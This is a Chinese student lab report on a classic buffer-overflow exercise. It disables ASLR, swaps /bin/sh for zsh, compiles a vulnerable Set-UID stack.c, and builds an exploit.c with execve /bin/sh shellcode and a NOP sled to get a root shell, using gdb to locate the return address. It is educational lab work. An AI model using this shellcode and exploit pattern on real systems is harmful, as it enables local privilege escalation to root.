• 缓冲区溢出漏洞实验


    20181235周昱涵缓冲区溢出漏洞实验

    一、实验介绍

    缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

    二、实验准备

    输入命令安装一些用于编译32位C程序的软件包:
    sudo apt-get update
    sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
    sudo apt-get install -y python3.6-gdbm gdb

    三、实验过程

    初始设置

    1、为方便实验我们需要先输入以下指令关闭Linux系统中使用地址空间随机化来随机堆和栈的初始地址的功能
    sudo sysctl -w kernel.randomize_va_space=0
    结果如下:

    2、此外,为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个Set-UID程序调用一个shell,也不能在这个shell中保持root权限,这个防护措施在/bin/bash中实现。linux系统中, /bin/sh实际是指向/bin/bash/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个shell程序(zsh)代替/bin/bash。下面的指令描述了如何设置zsh程序:
    sudo su
    cd /bin
    rm sh
    ln -s zsh sh
    exit
    3、输入命令1inux32进入32位inux环境。此时你·会发现,命令行用起来没那么爽了,比如不能tab补全了,输入/bin/bash使用bash:

    shellcode

    一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是shellcode.

    漏洞程序

    建立一个漏洞程序stack.c
    /* stack.c */

    /* This program has a buffer overflow vulnerability. */
    /* Our task is to exploit this vulnerability */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    int bof(char *str)
    {
    char buffer[12];
    ` /* The following statement has a buffer overflow problem */ ` ` strcpy(buffer, str);`
    return 1;
    }
    int main(int argc, char **argv) {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str);`` printf("Returned Properly\n"); return 1; }`

    通过代码可以知道,程序会读取一个名为"badfile"的文件,并将文件内容装入"buffer".编译该程序,并设置SET-UID,命令如下:
    sudo su
    gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
    chmod u+s stack
    exit

    攻击程序

    我们的目的是攻击刚才的漏洞程序,并通过攻击获得root权限。在/tmp目录下新建一个exploit.c文件,输入如下内容:
    /* exploit.c */
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50" //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin" //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50" //pushl %eax
    "\x53" //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99" //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;
    void main(int argc, char **argv) { char buffer[517]; FILE *badfile; memset(&buffer, 0x90, 517);
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
    strcpy(buffer + 100, shellcode);
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    }

    注意上面的代码, \x??\x??\x??\x??处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而strcpy(buffer+100, shellcode);这一句又告诉我们, shellcode保存在buffer + 100的位置。下面我们将详细介绍如何获得我们需要添加的地址。现在我们要得到shellcode在内存中的地址,输入命令进入gdb调试:
    gdb stack
    disass main
    结果如下:

    esp中就是str的起始地址,所以我们在地址0x080484ee处设置断点。
    接下来如下# 设置断点
    b *0x080484ee
    r
    i r $esp

    运用十六进制加法计算器进行计算> http://www.99cankao.com/digital-computation/hex-addition-calculator.php
    然后进行编译:
    gcc -m32 -o exploit exploit.c
    先运行攻击程序exploit,再运行漏洞程序stack,观察结果:

    实验地址https://www.lanqiao.cn/courses/reports/1353298/

  • 相关阅读:
    Oracle SQL FAQ
    miniasp(no encode)
    请看用javascript设置和读取cookie的简单例子
    asp流下载(Stream)
    (企业公司)网站开发方案
    asp发消息并代多个附件上传(多对多关系)
    tabpage1
    crystal report (asp调用水晶报表实例)
    上海万千文化传播有限公司(网站项目策划书)
    访问和更新Cookies集合
  • 原文地址:https://www.cnblogs.com/394991776zyh/p/13796758.html
Copyright © 2020-2023  润新知